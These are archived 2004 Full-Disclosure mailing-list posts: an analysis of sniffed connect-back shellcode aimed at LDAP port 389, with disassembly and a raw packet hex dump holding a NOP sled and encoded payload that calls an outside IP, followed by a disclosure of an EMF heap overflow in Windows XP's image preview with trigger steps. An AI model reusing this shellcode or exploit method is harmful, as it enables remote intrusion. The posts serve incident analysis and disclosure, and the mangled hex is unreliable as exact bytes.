We grabbed the binary data from the sniff'ed below. After a quick reverse, it turns out to be a connect-back shellcode with back server p- 24.19.147.225. Partially disassembled: 0084 68 18 13 93 E1 push0E1931318h 0089 68 02 00 22 E4 push0E4220002h 008E 8B CC mov ecx, esp 0090 6A 10 push10h 0092 51 pushecx 0093 FF 76 24pushdword ptr [esi+24h] 0096 FF D0 calleax = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = The following info was automatically generated by OSAnalyzer program. = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = call eax=776ba5a3 776ba5a3 = WS2_32.dll!connect with para 3 Para 0 is socket # 0094 Para 1 is name p- 00dafcc4 Para 2 is namelen 0010 sin_family AF_INET , port 8932 IP 24.19.147.225 call external 776ba5a3 stack 000c return ; === a quick translation = C:\TEMPping -a 24.19.147.225 Pinging c-24-19-147-225.client.comcast.net [24.19.147.225] with 32 bytes of data Hope the info is useful to you. Regards Peter Huang Peter.Huang AT ossecurity.ca http://www.ossecurity.ca/ Date: Wed, 25 Feb 2004 08:46:26 -0800 From: John Sage [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Probes on port 389 Just picked this up: On Tue, Feb 24, 2004 at 11:06:50AM -0600, Schmehl, Paul L wrote: From: Schmehl, Paul L [EMAIL PROTECTED] To: [EMAIL PROTECTED], [EMAIL PROTECTED] Subject: [Full-Disclosure] Probes on port 389 Date: Tue, 24 Feb 2004 11:06:50 -0600 I threw up a quick rule on snort to monitor probes on port 389 because I have been seeing entries in /var/log/messages on some boxes that I am responsible for. This morning we had a probe that hit 26205 different IPs on that port in about 7 minutes (SYN scan only - no payload.) The source IP was a mailserver in England. (They've been notified.) /* snip */ input: snort.log.1077660886 filter: ip and ( src host 24.6.176.211 ) # T 2004/02/25 08:08:15.042588 24.6.176.211:220 - 24.19.147.xxx:389 [S] # T 2004/02/25 08:08:15.092297 24.6.176.211:220 - 24.19.147.xxx:389 [R] # T 2004/02/25 08:08:15.097128 24.6.176.211:2211 - 24.19.147.xxx:389 [S] # T 2004/02/25 08:08:15.146174 24.6.176.211:2211 - 24.19.147.xxx:389 [A] # T 2004/02/25 08:08:15.154158 24.6.176.211:2211 - 24.19.147.xxx:389 [A] 30 82 0a 3d 02 01 01 6082 01 36 02 ff ff ff ff0..=...`..6. 50 a9 f7 00 10 13 90 9090 90 90 90 90 90 90 90P... 90 90 90 90 90 90 90 9090 90 90 90 90 90 90 90 90 90 90 90 90 90 90 9090 90 90 90 90 90 90 90 90 90 90 90 90 90 90 9090 90 90 90 90 90 90 90 90 90 90 90 90 90 90 9090 90 90 90 90 90 90 90 90 90 90 90 90 90 90 9090 90 90 90 90 90 90 90 90 90 90 90 90 90 90 9090 90 90 90 90 90 90 90 90 90 90 90 90 90 90 9090 90 90 90 90 90 90 90 90 90 90 90 90 90 90 9090 90 90 90 90 90 90 90 90 90 90 90 90 90 90 9090 90 90 90 90 90 90 90 90 90 90 90 90 90 90 9090 90 90 90 90 90 90 90 90 90 90 90 90 90 90 9090 eb 02 eb 05 e8 f9 ff ff ff 5b 80 c3 10 33 c966 b9 33 01 80 33 95 43..[...3.f.3..3.C e2 fa 14 79 05 94 95 951e 61 c0 c3 f1 34 a5 95...y.a...4.. 95 95 1e d5 99 1e e5 8938 1e fd 9d 7e 95 1e 508...~..P cb c8 1c 93 6a a3 fd 1bdb 9b 79 7d 38 95 95 95j.y}8... fd a6 a7 95 95 fd e2 e6a7 ca c1 6a 45 1e 6d c2...jE.m. fd 4c 9c 60 38 7d 06 9595 95 a6 5c c4 c4 c4 c4.L.`8}.\ d4 c4 d4 c4 6a 45 1c d3b1 c2 fd 79 6c 3f f5 7djE.yl?.} ec 95 95 95 fd 8d 86 0674 fd 97 95 b7 71 1e 59tq.Y ff 85 c4 6a e3 b1 6a 45fd f6 f8 f1 95 1c f3 a5...j..jE 6a a3 fd e7 6b 26 83 7dc4 95 95 95 1c d3 8b 16j...k.} 79 c1 18 a9 b1 a6 55 a65c 16 54 80 3e 77 68 53y.U.\.T.whS d1 b1 85 d1 6b d1 b1 a86b d1 b1 a9 1e d3 b1 1ck...k... d1 b1 dd 1c d1 b1 d9 1cd1 b1 c5 18 d1 b1 85 c1 c5 c4 c4 c4 ff 94 c4 c46a e3 a5 c4 6a c3 8b 6aj...j..j a3 fd 7a 5b 75 f5 7d 9795 95 95 6a 45 c6 c0 c3..z[u.}jE... c2 1e f9 b1 8d 1e d0 a91e c1 90 ed 96 40 1e df[EMAIL PROTECTED] 8d 1e cf b5 96 48 76 a7dc 1e a1 1e 96 60 a6 6a.Hv..`.j 69 a6 55 39 af 51 e1 9254 5a 98 96 6d 7e 67 aei.U9.Q..TZ..m~g. e9 b1 81 e0
[Full-Disclosure] (no subject)
We checked both EMF and WMF files out and changed around the sizes and it did not crash Windows XP (SP1, EN). From the posts on the full disclosure, it seems what you reported might be caused by other factors. Or it is exploitable on older version of XP? Here is a list of modules loaded. XP tested (not crashing): Build 2600 xpsp1.020828-1920; SP1 92 Module: 5cb0: C:\WINDOWS\System32\shimgvw.dll for C:\WINDOWS\EXPLORER.EXE 93 Module: 5cb0: C:\WINDOWS\System32\shimgvw.dll for C:\PROGRAM FILES\INTERNET EXPLORER\IEXPLORE.EXE Peter Huang OSsurance, Protection Against Win32 Viruses and BOF Worms http://www.ossecurity.ca/ -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Sent: Friday, February 20, 2004 1:46 PM To: [EMAIL PROTECTED] Subject: Windows XP explorer.exe heap overflow. Vulnerability in XP explorer.exe image loading -- Systems affected: Current XP - others not tested. Degree:Arbitrary code execution. Summary --- A malformed .emf (Enhanced Metafile, a graphics format) file can cause an exploitable heap overflow in (or near) shimgvw.dll. Details --- The image preview code that explorer uses has an exploitable buffer overflow. An .emf file with a total size field set to less than the header size will causes explorer.exe to crash in the heap routines - in classic heap overflow style that should be exploitable a la the RPC exploits. There are two overflows here: 1. A buffer is allocated with the size indicated in the header (no validity checks), then the header is copied into it - if the size is less than the header size, that's one overflow. 2. They then proceed to read the rest of the file to a length of (size-headersize), which allows for an integer overflow causing the rest of the file to be appended to the already blown buffer. Exploit --- To exploit this flaw (in explorer), simply place a malformed (invalid size field) .emf file in any directory, open explorer to that path, and view as Thumbnails. Bang. In it's simplest form it's a DOS - it affects all explorer windows, including File Open dialogs for many programs. Alternatively, without viewing as a Thumbnail, open the picture preview window for the .emf file. (It's the default double-click action). Using this trigger causes a different crash point, which may not be exploitable, but I wouldn't rule it out. Additional notes It may be worth checking out similar issues in .wmf files, as they are similar. - Jellytop, 2004 If a man will begin with certainties, he shall end in doubts; but if he will be content to begin with doubts he shall end in certainties. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html